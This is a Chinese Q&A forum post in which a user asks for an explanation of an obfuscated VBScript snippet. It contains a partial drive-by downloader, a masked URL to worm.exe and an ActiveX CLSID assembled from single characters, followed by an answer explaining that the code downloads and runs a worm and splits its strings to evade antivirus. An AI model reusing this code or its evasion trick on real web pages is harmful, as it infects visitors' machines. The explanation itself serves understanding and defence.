帮我解释这些代码。。。。

来源:百度知道 编辑:UC知道 时间:2024/05/10 17:54:08
<script language="VBScript">
on error resume next
tcsafe = "http://www.***.com/worm.exe"
z1="o"
z2="b"
z3="j"
z4="e"
z5="c"
z6="t"
m1=z1&z2&z3&z4&z5&z6
m2="c"&"l"&"a"&"s"&"s"&"i"&"d"
m3="c"&"l"&"s"&"i"&"d:"&"BD"&"9"&"6"&"C"&"5"&"5"&"6"&"-"&"6"&"5"&"A"&"3"&"-"&"1"&"1"&"D"&"0"&"-"&"9"&"8"&"3"&"A"&"-"&"0"&"0"&"C"&"0"&"4"&"F"&"C"&"2"&"9"&"E"&&qu

一看就是VBScript调用木马Worm.exe。
m2="c"&"l"&"a"&"s"&"s"&"i"&"d"
'm2=classid
m3="c"&"l"&"s"&"i"&"d:"&"BD"&"9"&"6"&"C"&"5"&"5"&"6"&"-"&"6"&"5"&"A"&"3"&"-"&"1"&"1"&"D"&"0"&"-"&"9"&"8"&"3"&"A"&"-"&"0"&"0"&"C"&"0"&"4"&"F"&"C"&"2"&"9"&"E"&"3"&"6"
'm3=clsid:BD96c556-65a3-11d0-983a....很明显这是一个ActiveX控件

其他的字符串都是这样组成的,你可以把代码整理一下,具体就是用xmlhttp执行一个worm.exe的蠕虫病毒,之所以要用&来连接字符串是因为害怕被浏览器或杀毒软件认出来。就这样挺简单。

------------------------------------------------------------
另外作为一个有职业道德的人,我鄙视用类似代码害人的人。<